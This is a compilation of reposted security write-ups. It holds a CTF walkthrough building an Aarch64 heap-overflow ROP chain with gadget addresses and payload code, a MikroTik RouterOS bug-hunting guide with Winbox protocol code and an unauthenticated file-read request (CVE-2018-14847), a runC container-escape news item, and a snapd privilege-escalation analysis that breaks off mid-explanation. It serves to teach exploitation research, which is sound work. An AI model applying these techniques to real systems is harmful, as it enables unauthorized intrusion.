ROP-ing on Aarch64 — The CTF Style

Original text by Perfect Blue

Aarch64 basics

Before we dive into the challenge, let’s just skim over the basics quickly. I’ll try to explain everything to the best of my ability and knowledge.

Registers

Aarch64 has 31 general purpose registers, x0 to x30. Since it’s a 64 bit architechture, all the registers are 64 bit. But we can access the lower 32 bits of thes registers by using them with the w prefix, such as w0 and w1.

There is also a 32nd register, known as xzr or the zero register. It has multiple uses which I won’t go into but in certain contexts, it is used as the stack pointer (esp equivalent) and is thereforce aliased as sp.

Instructions

Here are some basic instructions:

  • mov — Just like it’s x86 counterpart, copies one register into another. It can also be used to load immediate values. mov x0, x1; copies x1 into x0 mov x1, 0x4141; loads the value 0x4141 in x1
  • str/ldr — store and load register. Basically stores and loads a register from the given pointer. str x0, [x29]; store x0 at the address in x29 ldr x0, [x29]; load the value from the address in x29 into x0
    • stp/ldp — store and load a pair of registers. Same as str/ldr but instead with a pair of registers stp x29, x30, [sp]; store x29 at sp and x30 at sp+8
  • bl/blr — Branch link (to register). The x86 equivalent is call. Basically jumps to a subroutine and stores the return address in x30. blr x0; calls the subroutine at the address stored in x0
  • b/br — Branch (to register). The x86 equivalent is jmp. Basically jumps to the specified address br x0; jump to the address stored in x0
  • ret — Unlike it’s x86 equivalent which pops the return address from stack, it looks for the return address in the x30 register and jumps there.

Indexing modes

Unlike x86, load/store instructions in Aarch64 has three different indexing “modes” to index offsets:

  • Immediate offset : [base, #offset] — Index an offset directly and don’t mess with anything else ldr x0, [sp, 0x10]; load x0 from sp+0x10
  • Pre-indexed : [base, #offset]! — Almost the same as above, except that base+offset is written back into base. ldr x0, [sp, 0x10]!; load x0 from sp+0x10 and then increase sp by 0x10
  • Post-indexed : [base], #offset — Use the base directly and then write base+offset back into the base ldr x0, [sp], 0x10; load x0 from sp and then increase sp by 0x10

Stack and calling conventions

  • The registers x0 to x7 are used to pass parameters to subroutines and extra parameters are passed on the stack.
  • The return address is stored in x30, but during nested subroutine calls, it gets preserved on the stack. It is also known as the link register.
  • The x29 register is also known as the frame pointer and it’s x86 equivalent is ebp. All the local variables on the stack are accessed relative to x29 and it holds a pointer to the previous stack frame, just like in x86.
    • One interesting thing I noticed is that even though ebp is always at the bottom of the current stack frame with the return address right underneath it, the x29 is stored at an optimal position relative to the local variables. In my minimal testcases, it was always stored on the top of the stack (along with the preserved x30) and the local variables underneath it (basically a flipped oritentation compared to x86).

The challenge

We are provided with the challenge files and the following description:

Challenge runs on ubuntu 18.04 aarch64, chrooted

It comes with the challenge binary, the libc and a placeholder flag file. It was the mentioned that the challenge is being run in a chroot, so we probably can’t get a shell and would need to do a open/read/write ropchain.

The first thing we need is to set-up an environment. Fortunately, AWS provides pre-built Aarch64 ubuntu server images and that’s what we will use from now on.

Part 1 — The heap

Not Yet Another Note Challenge...
====== menu ======
1. alloc
2. view
3. edit
4. delete
5. quit

We are greeted with a wonderful and familiar (if you’re a regular CTFer) prompt related to heap challenges.

Playing with it a little, we discover an int underflow in the alloc function, leading to a heap overflow in the edit function:

__int64 do_add()
{
  __int64 v0; // x0
  int v1; // w0
  signed __int64 i; // [xsp+10h] [xbp+10h]
  __int64 v4; // [xsp+18h] [xbp+18h]

  for ( i = 0LL; ; ++i )
  {
    if ( i > 7 )
      return puts("no more room!");
    if ( !mchunks[i].pointer )
      break;
  }
  v0 = printf("len : ");
  v4 = read_int(v0);
  mchunks[i].pointer = malloc(v4);
  if ( !mchunks[i].pointer )
    return puts("couldn't allocate chunk");
  printf("data : ");
  v1 = read(0LL, mchunks[i].pointer, v4 - 1);
  LOWORD(mchunks[i].size) = v1;
  *(_BYTE *)(mchunks[i].pointer + v1) = 0;
  return printf("chunk %d allocated\n");
}

__int64 do_edit()
{
  __int64 v0; // x0
  __int64 result; // x0
  int v2; // w0
  __int64 v3; // [xsp+10h] [xbp+10h]

  v0 = printf("index : ");
  result = read_int(v0);
  v3 = result;
  if ( result >= 0 && result <= 7 )
  {
    result = LOWORD(mchunks[result].size);
    if ( LOWORD(mchunks[v3].size) )
    {
      printf("data : ");
      v2 = read(0LL, mchunks[v3].pointer, (unsigned int)LOWORD(mchunks[v3].size) - 1);
      LOWORD(mchunks[v3].size) = v2;
      result = mchunks[v3].pointer + v2;
      *(_BYTE *)result = 0;
    }
  }
  return result;
}

If we enter 0 as len in alloc, it would allocate a valid heap chunk and read -1 bytes into it. Because read uses unsigned values, -1 would become 0xffffffffffffffff and the read would error out as it’s not possible to read such a huge value.

With read erroring out, the return value (-1 for error) would then be stored in the size member of the global chunk struct. In the edit function, the size is used as a 16 bit unsigned int, so -1 becomes 0xffff, leading to the overflow

Since this post is about ROP-ing and the heap in Aarch64 is almost the same as x86, I’ll just be skimming over the heap exploit.

  • Because there was no free() in the binary, we overwrote the size of the top_chunk which got freed in the next allocation, giving us a leak.
  • Since the challenge server was using libc2.27, tcache was available which made our lives a lot easier. We could just overwrite the FD of the top_chunk to get an arbitrary allocation.
  • First we leak a libc address, then use it to get a chunk near environ, leaking a stack address. Finally, we allocate a chunk near the return address (saved x30 register) to start writing our ROP-chain.

Part 2 — The ROP-chain

Now starts the interesting part. How do we find ROP gadgets in Aarch64?

Fortunately for us, ropper supports Aarch64. But what kind of gadgets exist in Aarch64 and how can we use them?

$ ropper -f libc.so.6 
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%



Gadgets
=======


0x00091ac4: add sp, sp, #0x140; ret; 
0x000bf0dc: add sp, sp, #0x150; ret; 
0x000c0aa8: add sp, sp, #0x160; ret; 
....

Aaaaand we are blasted with a shitload of gadgets.

  • Most of the these are actually not very useful as the ret depends on the x30 register. The address in x30 is where gadget will return when it executes a ret.
  • If the gadget doesn’t modify x30 in a way we can control it, we won’t be able to control the exectuion flow and get to the next gadget.

So to get a ROP-chain running in Aarch64, we can only use the gadgets which:

  • perform the function we want
  • pop x30 from the stack
  • ret

With our heap exploit, we were only able to allocate a 0x98 chunk on the stack and the whole open/read/write chain would take a lot more space, so the first thing we need is to read in a second ROP-chain.

One way to do that is to call gets(stack_address), so we can basically write an infinite ROP-chain on the stack (provided no newlines).

So how do we call gets()? It’s a libc function and we already have a libc leak, the only thing we need is to get the address of gets in x30 and a stack address in x0 (function parameters are passedin x0 to x7).

After a bit of gadget hunting, here is the gadget I settled upon:

0x00062554: ldr x0, [x29, #0x18]; ldp x29, x30, [sp], #0x20; ret;

It essentially loads x0 from x29+0x18 and then pop x29 and x30 from the top of the stack (ldp xx,xy [sp] is essentially equal to popping). It then moves stack down by 0x20 (sp+0x20 in post indexed addressing).

In almost all the gadgets, most of loads/stores are done relative to x29 so we need to make sure we control it properely too.

Here is how the stack looks at the epilogue of the alloc function just before the execution of our first gadget.

stack_code

It pops the x29 and x30 from the stack and returns, jumping to our first gadget. Since we control x29, we control x0.

Now the only thing left is to return to gets, but it won’t work if we return directly at the top of gets.

Why? Let’s look at the prologue of gets

<_IO_gets>:    stp    x29, x30, [sp, #-48]!
<_IO_gets+4>:    mov    x29, sp

gets assume that the return address is in x30 (it would be in a normal execution) and thus it tries to preserve it on the stack along with x29.

Unfortunately for us, since we reached there with ret, the x30 holds the address of gets itself.

If this continues, it would pop the preserved x30 at the end of gets and then jump back to gets again in an infinite loop.

To bypass it, we use a simple trick and return at gets+0x8, skipping the preservation. This way, when it pops x30 at the end, we would be able to control it and jump to our next gadget.

This is the rough sketch of our first stage ROP-chain:

gadget = libcbase + 0x00062554 #0x0000000000062554 : ldr x0, [x29, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret // to control x0

payload = ""

payload += p64(next_x29) + p64(gadget) + p64(0x0) + p64(0x8) # 0x0 and 0x8 are the local variables that shouldn't be overwritten
payload += p64(next_x29) + p64(gets_address) + p64(0x0) + p64(new_x29_stack) # Link register pointing to the next frame + gets() of libc + just a random stack variable + param popped by gadget_1 into x1 (for param of gets)

Now that we have infinite space for our second stage ROP-chain, what should we do?

At first we decided to do the open/read/write all in ROP but it would make it unnecessarily long and complex, so instead we mprotect() the stack to make it executable and then jump to shellcode we placed on the stack.

mprotect takes 3 arguments, so we need to control x0, x1 and x2 to succeed.

Well, we began gadget hunting again. We already control x0, so we found this gadget:

gadget_1 = 0x00000000000ed2f8 : mov x1, x0 ; ret

At first glance, it looks perfect, copying x0 into x1. But if you have been paying close attention, you would realize it doesn’t modify x30, so we won’t be able to control execution beyond this.

What if we take a page from JOP (jump oriented programming) and find a gadget which given us the control of x30 and then jumps (not call) to another user controlled address?

gadget_2 = 0x000000000006dd74 :ldp x29, x30, [sp], #0x30 ; br x3

Oh wowzie, this one gives us the control of x30 and then jumps to x3. Now we just need to control x3…..

gadget_3 = 0x000000000003f8c8 : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret

gadget_4 = 0x0000000000026dc4 : mov x3, x19 ; mov x2, x26 ; blr x20

The first gadget here gives us control of x19 and x20, the second one moves x19 into x3 and calls x20.

Chaining these two, we can control x3 and still have control over the execution.

Here’s our plan:

  • Have x0 as 0x500 (mprotect length) with the same gadget we used before
  • Use gadget_3 to make x19 = gadget_1 and x20 = gadget_2
  • return to gadget_4 from gadget_3, making x3 = x19 (gadget_1)
  • gadget_4 calls x20 (gadget_2)
  • gadget_2 gives us a controlled x30 and jumps to x3 (gadget_1)
  • gadget_1 moves x0 (0x500) into x1 and returns

Here’s the rough code equivalent:

payload = ""

payload += p64(next_x29) + p64(gadget_3) + p64(0x0) * x (depends on stack) #returns to gadget_3

payload += p64(next_x29) + p64(gadget_4) + p64(gadget_1) + p64(gadget_2) + p64(0x0) * 4 # moves gadget_1/3 into x19/20 and returns to gadget_4

payload += p64(next_x29) + p64(next_gadget) #setting up for the next gadget and moving x19 into x3. x20 (gadget_2) is called from gadget_4

That was haaard, now let’s see how we can control x2…

gadget_6 = 0x000000000004663c : mov x2, x21 ; blr x3

This is the only new gadget we need. It moves x21 into x2 and calls x3. We can already control x21 and x3 with the help of gadget_4 and gadget_3.

Now that we have full control over x0, x1 and x2, we just need to put it all together and shellcode the flag read. I won’t go into details about that.

And that’s a wrap folks, you can find our final exploit here

Реклама

Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.


Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMWare.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/boot.cat
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var
albinolobster@ubuntu:~/6.42.11$

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.


Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 
/nova/bin/log,3
/nova/bin/radius,5
/nova/bin/moduler,6
/nova/bin/user,13
/nova/bin/resolver,14
/nova/bin/mactel,15
/nova/bin/undo,17
/nova/bin/macping,18
/nova/bin/cerm,19
/nova/bin/cerm-worker,75
/nova/bin/net,20
...

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.


Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton programthat you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
{
return EXIT_FAILURE;
}
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is bolded).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(17);

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe00016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looperconstructor’s only code cross reference.

Follow the offset to vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve bolded the new part.

WinboxMessage msg;
msg.set_to(17);
msg.set_command(0x80002);
msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

There’s Rarely Just One

In the previous example, you looked at the main handler in undo which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is “none of them” look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_commandcode. You’ll also want to insert the add_string. I’ve bolded the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(2,2); // mproxy, second handler
msg.set_command(7);
msg.add_string(1, "list"); // the file to open

msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.

Conclusion

I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

SensorsTechForum NEWSTHREAT REMOVALREVIEWSFORUMSSEARCH NEWS CVE-2019-5736 Linux Flaw in runC Allows Unauthorized Root Access

Original text by Milena Dimitrova

CVE-2019-5736 is yet another Linux vulnerability discovered in the core runC container code. The runC tool is described as a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.

CVE-2019-5736 Technical Details

The security flaw potentially affects several open-source container management systems. Shortly said, the flaw allows attackers to get unauthorized, root access to the host operating system, thus escaping Linux container.

In more technical terms, the vulnerability:

allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe, as explained in the official advisory.

The CVE-2019-5736 vulnerability was unearthed by open source security researchers Adam Iwaniuk and Borys Popławski. However, it was publicly disclosed by Aleksa Sarai, a senior software engineer and runC maintainer at SUSE Linux GmbH on Monday.

“I am one of the maintainers of runc (the underlying container runtime underneath Docker, cri-o, containerd, Kubernetes, and so on). We recently had a vulnerability reported which we have verified and have a
patch for,” Sarai wrote.

The researcher also said that a malicious user would be able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

– Creating a new container using an attacker-controlled image.
– Attaching (docker exec) into an existing container which the attacker had previous write access to.

It should also be noted that CVE-2019-5736 isn’t blocked by the default AppArmor policy, nor
by the default SELinux policy on Fedora[++], due to the fact that container processes appear to be running as container_runtime_t.

Nonetheless, the flaw is blocked through correct use of user namespaces where the host root is not mapped into the container’s user namespace.

 Related: CVE-2018-14634: Linux Mutagen Astronomy Vulnerability Affects RHEL and Cent OS Distros

CVE-2019-5736 Patch and Mitigation

Red Hat says that the flaw can be mitigated when SELinux is enabled in targeted enforcing mode, a condition which comes by default on RedHat Enterprise Linux, CentOS, and Fedora.

There’s also a patch released by the maintainers of runC available on GitHub. Please note that all projects which are based on runC should apply the patches themselves.

Who’s Affected?

Debian and Ubuntu are vulnerable to the vulnerability, as well as container systems running LXC, a Linux containerization tool prior to Docker. Apache Mesos container code is also affected.

Companies such as Google, Amazon, Docker, and Kubernetes are have also released fixes for the flaw.

Privilege Escalation in Ubuntu Linux (dirty_sock exploit)

Original text by Chris Moberly

In January 2019, I discovered a privilege escalation vulnerability in default installations of Ubuntu Linux. This was due to a bug in the snapd API, a default service. Any local user could exploit this vulnerability to obtain immediate root access to the system.

Two working exploits are provided in the dirty_sock repository:

  1. dirty_sockv1: Uses the ‘create-user’ API to create a local user based on details queried from the Ubuntu SSO.
  2. dirty_sockv2: Sideloads a snap that contains an install-hook that generates a new local user.

Both are effective on default installations of Ubuntu. Testing was mostly completed on 18.10, but older verions are vulnerable as well.

The snapd team’s response to disclosure was swift and appropriate. Working with them directly was incredibly pleasant, and I am very thankful for their hard work and kindness. Really, this type of interaction makes me feel very good about being an Ubuntu user myself.

TL;DR

snapd serves up a REST API attached to a local UNIX_AF socket. Access control to restricted API functions is accomplished by querying the UID associated with any connections made to that socket. User-controlled socket peer data can be affected to overwrite a UID variable during string parsing in a for-loop. This allows any user to access any API function.

With access to the API, there are multiple methods to obtain root. The exploits linked above demonstrate two possibilities.

Background — What is Snap?

In an attempt to simplify packaging applications on Linux systems, various new competing standards are emerging. Canonical, the makers of Ubuntu Linux, are promoting their “Snap” packages. This is a way to roll all application dependencies into a single binary — similar to Windows applications.

The Snap ecosystem includes an “app store” where developers can contribute and maintain ready-to-go packages.

Management of locally installed snaps and communication with this online store are partially handled by a systemd service called “snapd”. This service is installed automatically in Ubuntu and runs under the context of the “root” user. Snapd is evolving into a vital component of the Ubuntu OS, particularly in the leaner spins like “Snappy Ubuntu Core” for cloud and IoT.

Vulnerability Overview

Interesting Linux OS Information

The snapd service is described in a systemd service unit file located at /lib/systemd/system/snapd.service.

Here are the first few lines:

[Unit]
Description=Snappy daemon
Requires=snapd.socket

This leads us to a systemd socket unit file, located at /lib/systemd/system/snapd.socket

The following lines provide some interesting information:

[Socket]
ListenStream=/run/snapd.socket
ListenStream=/run/snapd-snap.socket
SocketMode=0666

Linux uses a type of UNIX domain socket called “AF_UNIX” which is used to communicate between processes on the same machine. This is in contrast to “AF_INET” and “AF_INET6” sockets, which are used for processes to communicate over a network connection.

The lines shown above tell us that two socket files are being created. The ‘0666’ mode is setting the file permissions to read and write for all, which is required to allow any process to connect and communicate with the socket.

We can see the filesystem representation of these sockets here:

$ ls -aslh /run/snapd*
0 srw-rw-rw- 1 root root  0 Jan 25 03:42 /run/snapd-snap.socket
0 srw-rw-rw- 1 root root  0 Jan 25 03:42 /run/snapd.socket

Interesting. We can use the Linux “nc” tool (as long as it is the BSD flavor) to connect to AF_UNIX sockets like these. The following is an example of connecting to one of these sockets and simply hitting enter.

$ nc -U /run/snapd.socket

HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close

400 Bad Request

Even more interesting. One of the first things an attacker will do when compromising a machine is to look for hidden services that are running in the context of root. HTTP servers are prime candidates for exploitation, but they are usually found on network sockets.

This is enough information now to know that we have a good target for exploitation — a hidden HTTP service that is likely not widely tested as it is not readily apparent using most automated privilege escalation checks.

NOTE: Check out my work-in-progress privilege escalation tool uptux that would identify this as interesting.

Vulnerable Code

Being an open-source project, we can now move on to static analysis via source code. The developers have put together excellent documentation on this REST API available here.

The API function that stands out as highly desirable for exploitation is “POST /v2/create-user”, which is described simply as “Create a local user”. The documentation tells us that this call requires root level access to execute.

But how exactly does the daemon determine if the user accessing the API already has root?

Reviewing the trail of code brings us to this file (I’ve linked the historically vulnerable version).

Let’s look at this line:

ucred, err := getUcred(int(f.Fd()), sys.SOL_SOCKET, sys.SO_PEERCRED)

This is calling one of golang’s standard libraries to gather user information related to the socket connection.

Basically, the AF_UNIX socket family has an option to enable receiving of the credentials of the sending process in ancillary data (see man unix from the Linux command line).

This is a fairly rock solid way of determining the permissions of the process accessing the API.

Using a golang debugger called delve, we can see exactly what this returns while executing the “nc” command from above. Below is the output from the debugger when we set a breakpoint at this function and then use delve’s “print” command to show what the variable “ucred” currently holds:

> github.com/snapcore/snapd/daemon.(*ucrednetListener).Accept()
...
   109:			ucred, err := getUcred(int(f.Fd()), sys.SOL_SOCKET, sys.SO_PEERCRED)
=> 110:			if err != nil {
...
(dlv) print ucred
*syscall.Ucred {Pid: 5388, Uid: 1000, Gid: 1000}

